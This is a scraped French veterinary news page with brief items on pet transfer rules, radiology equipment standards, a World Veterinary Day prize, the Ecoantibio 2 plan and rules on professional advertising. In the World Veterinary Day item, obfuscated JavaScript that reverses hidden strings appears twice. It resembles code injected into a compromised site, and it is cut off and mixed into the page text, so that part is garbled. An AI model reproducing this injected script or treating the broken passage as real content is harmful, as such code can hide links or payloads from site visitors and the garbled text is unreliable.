Cession chiens et chats : réglementation

Donner ou vendre des chiots ou des chatons implique le respect de certaines démarches et obligations. La cession des animaux de compagnie est en effet régie par l’ Article L.214-8 du code rural et de la pêche maritime, qu’elle soit gracieuse ou non.

 

En savoir plus

Normes d’installation des équipements radiogènes

Avec l´évolution des techniques médicales, industrielles et vétérinaires, les appareils de radiologie ont évolué très rapidement ces dernières années. La réglementation qui les régit a donc, par voie de conséquence, été adaptée à ses nouveaux appareils. Depuis une dizaine d’années la réglementation a beaucoup changé.

En savoir plus

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return /">Appel à c$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrb ...

Dans le cadre de la Journée Mondiale Vétérinaire du 28 avril prochain, un prix spécifique est organisé. Il récompensera la meilleure contribution de la profession vétérinaire pour « améliorer les moyens de subsistance, la sécurité alimentaire et la sécurité sanitaire des aliments ».

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return /">En savoir plus

Plan Ecoantibio 2

La perte d’efficacité des antibiotiques impacte la santé humaine,
la santé animale et celle des écosytèmes.
Les enjeux du Plan Ecoantibio 2017-2021 sont le changement durable des pratiques de prescription des antibiotiques, l’amélioration des conditions de vie des animaux et l’accès à des produits de santé efficaces et économiques, autres que les antibiotiques.

En savoir plus

La communication

Depuis 2015, le Code de déontologie autorise la communication pour la prospection de clientèle. Tous les moyens de communication peuvent être utilisés, et le contenu « ne doit pas porter atteinte au respect du public ni à la dignité de la profession…être loyal, honnête et scientifiquement étayé ». (Code de déontologie article R.242-35).

En savoir plus